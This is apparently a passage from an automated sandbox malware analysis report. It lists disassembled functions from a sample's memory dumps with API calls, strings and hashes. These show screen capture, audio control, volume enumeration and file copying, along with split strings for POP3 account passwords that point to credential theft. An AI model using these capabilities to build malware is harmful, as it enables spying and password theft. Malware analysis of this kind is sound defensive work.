                                                                                                                                                                • Instruction ID: 3b52749c0dd39757503f2c0454677227f64308e89c5641646e7009818c913aed
                                                                                                                                                                • Opcode Fuzzy Hash: 7173378b8d83ddb26483eec24d719cfef6c2aa372f32af207c525230e285bc25
                                                                                                                                                                • Instruction Fuzzy Hash: 4BE08C31640225AFDA206BA1DC19FDE7BD9DF00F92F844129F909EB591CB79C98097E4
                                                                                                                                                                Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                Function 000A50DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 000A5131
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                                • Opcode ID: f8c2eda127a20b530770ad5dd18216171965544f246970604ef4eb3ebde2975d
                                                                                                                                                                • Instruction ID: d998e1c5c9c0529712544cd2abd7734393e05f9878c537b8e6854cd61ff69774
                                                                                                                                                                • Opcode Fuzzy Hash: f8c2eda127a20b530770ad5dd18216171965544f246970604ef4eb3ebde2975d
                                                                                                                                                                • Instruction Fuzzy Hash: E3F02431A41608BBEB116FA4DC06FFE7BA5FF49B12F004114FD043A292CB768D209AD4
                                                                                                                                                                Function 000AF197 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A38D4: GetLastError.KERNEL32(00000000,?,00098255,?,?,?,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A38D8
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A390B
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A394C
                                                                                                                                                                  • Part of subcall function 000A38D4: _abort.LIBCMT ref: 000A3952
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000AEF35,00000000,00000000,?), ref: 000AF1C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2692324296-0
                                                                                                                                                                • Opcode ID: 013fc3a15cd5039bff94c4332ef7ebb0a260789787e382331f0fe10f2e91ab84
                                                                                                                                                                • Instruction ID: 5d83da23251cb214ca6570e682870cce62fa0950556c47dc8ac2108e77cee21d
                                                                                                                                                                • Opcode Fuzzy Hash: 013fc3a15cd5039bff94c4332ef7ebb0a260789787e382331f0fe10f2e91ab84
                                                                                                                                                                • Instruction Fuzzy Hash: 7CF0F932A00116FBDB249BE4CC06BFA77A8EB41754F144439EC15A3140EA39BD01C790
                                                                                                                                                                Function 0258F829 Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cd74b34ad392a09e22e84705e34531d19268d03eec72c5563b186773a7827bd3
                                                                                                                                                                • Instruction ID: 25e0ee946dc871349302713101d50e8eb5f5e17c382e195faf82d27baf0a397e
                                                                                                                                                                • Opcode Fuzzy Hash: cd74b34ad392a09e22e84705e34531d19268d03eec72c5563b186773a7827bd3
                                                                                                                                                                • Instruction Fuzzy Hash: 7AE0463100050AABDF117F14CE88A8D3F2AFB88262F508428F908AB970CB75DD82CE44
                                                                                                                                                                Function 0007717A Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 330windowmemoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00077195
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 000771A1
                                                                                                                                                                  • Part of subcall function 000775FE: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00077632
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0007720C
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 00077224
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077227
                                                                                                                                                                • DeleteObject.GDI32(76F90F00), ref: 0007722B
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00077248
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007725B
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0007725E
                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00077282
                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 0007729D
                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 000772B1
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 000772D6
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 000772DF
                                                                                                                                                                • DrawIcon.USER32(?,00000000,00000000,?), ref: 000772EE
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00077319
                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0007733C
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 000773A2
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0007740B
                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0007742B
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007743E
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077441
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00077446
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00077450
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 000774F5
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 000774FC
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0007750B
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00077516
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                • String ID: DISPLAY
                                                                                                                                                                • API String ID: 4256916514-865373369
                                                                                                                                                                • Opcode ID: 395db98ef48a5290218062df6bbd7a17d9fc2e5e8c4dd37c76e7e4e61e75516e
                                                                                                                                                                • Instruction ID: 5f7af0770e8d873e0eaf294f87af3fdfea9b47598973306ba7a01f0afa3e81b7
                                                                                                                                                                • Opcode Fuzzy Hash: 395db98ef48a5290218062df6bbd7a17d9fc2e5e8c4dd37c76e7e4e61e75516e
                                                                                                                                                                • Instruction Fuzzy Hash: F2C17D71D04219AFEB249FA4CC45BEEBBB5FF08340F008159F909E7291DB79AA45CB54
                                                                                                                                                                Function 6FE7B840 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 338libraryloadersynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6FE7B880
                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6FE7B894
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6FE7B8C7
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetOptions), ref: 6FE7B8F6
                                                                                                                                                                • GetProcAddress.KERNEL32(SymInitializeW), ref: 6FE7B926
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7B942
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6FE7B9C2
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7B9D7
                                                                                                                                                                • lstrlenW.KERNEL32(00000002), ref: 6FE7B9EC
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6FE7BA1D
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6FE7BA9C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6FE7BABF
                                                                                                                                                                • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6FE7BB43
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7BB58
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6FE7BBBD
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE7BBD5
                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 6FE7BC19
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                                                                                                                                                • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                                                                                                                                • API String ID: 422451348-356128008
                                                                                                                                                                • Opcode ID: 97c3881b44fc35a42b54e1bb528e21fbca3ee264262941bd5a8de0183db59069
                                                                                                                                                                • Instruction ID: f81f9742aea584391723283cd9b0eb17a742fab1e6ec776edebe1d1b07f75da3
                                                                                                                                                                • Opcode Fuzzy Hash: 97c3881b44fc35a42b54e1bb528e21fbca3ee264262941bd5a8de0183db59069
                                                                                                                                                                • Instruction Fuzzy Hash: 04D1B175D006189FDB20CFA8D88579EBFB5BF06318F208129E815BB384EF759851CB62
                                                                                                                                                                Function 0007930E Relevance: 45.7, APIs: 12, Strings: 14, Instructions: 180synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 000793E5
                                                                                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 000793F9
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,000C2774), ref: 0007941E
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,000D1EC0,00000000), ref: 00079434
                                                                                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00079475
                                                                                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0007948D
                                                                                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 000794A1
                                                                                                                                                                • SetEvent.KERNEL32 ref: 000794C2
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 000794D3
                                                                                                                                                                • CloseHandle.KERNEL32 ref: 000794E3
                                                                                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00079505
                                                                                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0007950F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                • String ID: alias audio$" type $P)$P)$P)$`!Yt$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                • API String ID: 738084811-1747748789
                                                                                                                                                                • Opcode ID: 29c333a06e99dec74908ac9bb13eb30342b59baf7a4c5bc01807fd2dc36bc0f8
                                                                                                                                                                • Instruction ID: 6266d6ab396583f5d6740adbe27fc894688ee43ade48eaa753a5d3a1284727e0
                                                                                                                                                                • Opcode Fuzzy Hash: 29c333a06e99dec74908ac9bb13eb30342b59baf7a4c5bc01807fd2dc36bc0f8
                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C271B001087EEB14B7A4EC92DFE7BAEEF40744B04812EF50657192DF284E49C7A6
                                                                                                                                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                Function 6FE78FA0 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 322libraryloadersynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE746C0: SetLastError.KERNEL32(00000000), ref: 6FE74783
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6FE7478B
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetLastError.KERNEL32 ref: 6FE74797
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetLastError.KERNEL32 ref: 6FE747A9
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 6FE790DE
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 6FE790E7
                                                                                                                                                                • RtlCaptureContext.KERNEL32(?), ref: 6FE79107
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6FE79149
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6FE79173
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE79188
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalkEx), ref: 6FE791AB
                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 6FE792D1
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalk64), ref: 6FE79404
                                                                                                                                                                Strings
                                                                                                                                                                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6FE792F8
                                                                                                                                                                • stack backtrace:, xrefs: 6FE79063
                                                                                                                                                                • SymGetModuleBase64, xrefs: 6FE79168
                                                                                                                                                                • StackWalk64, xrefs: 6FE793F9
                                                                                                                                                                • StackWalkEx, xrefs: 6FE791A0
                                                                                                                                                                • SymFunctionTableAccess64, xrefs: 6FE7913E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                                                                                                                                • API String ID: 1741357895-2373373428
                                                                                                                                                                • Opcode ID: 694f87f5955906abe9d3278254a3392aea64e9985ac01c6957c32050e1bee662
                                                                                                                                                                • Instruction ID: 663652eab98a87918438f2d089e518ec77e8cb86d2c1e727c821e45477cc3450
                                                                                                                                                                • Opcode Fuzzy Hash: 694f87f5955906abe9d3278254a3392aea64e9985ac01c6957c32050e1bee662
                                                                                                                                                                • Instruction Fuzzy Hash: A4E127B0500B009FE731CF25C885B87BBF5BF06718F20891DE9AA8B691EB71B459CB51
                                                                                                                                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                Function 000AA39D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899193279-0
                                                                                                                                                                • Opcode ID: 8087455c4ebb90223d634b0e67a099956c4f3c268e3c54407acc501d17f3484f
                                                                                                                                                                • Instruction ID: be10ccb430a4776b346f92bf077fa56d51f74e6821556efa41a4de30c42b5f93
                                                                                                                                                                • Opcode Fuzzy Hash: 8087455c4ebb90223d634b0e67a099956c4f3c268e3c54407acc501d17f3484f
                                                                                                                                                                • Instruction Fuzzy Hash: 97D1F471B003016FDB65AFF89845AFEBBE5AF57320F04426DF9419B2C2EB359901CA52
                                                                                                                                                                Function 0007A188 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147stringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,?), ref: 0007A1A5
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0007A1CD
                                                                                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104), ref: 0007A1F4
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A202
                                                                                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0007A278
                                                                                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0007A291
                                                                                                                                                                • FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 0007A2AA
                                                                                                                                                                • FindVolumeClose.KERNEL32(00000018), ref: 0007A2EA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A2FE
                                                                                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0007A330
                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0007A348
                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0007A356
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A35E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
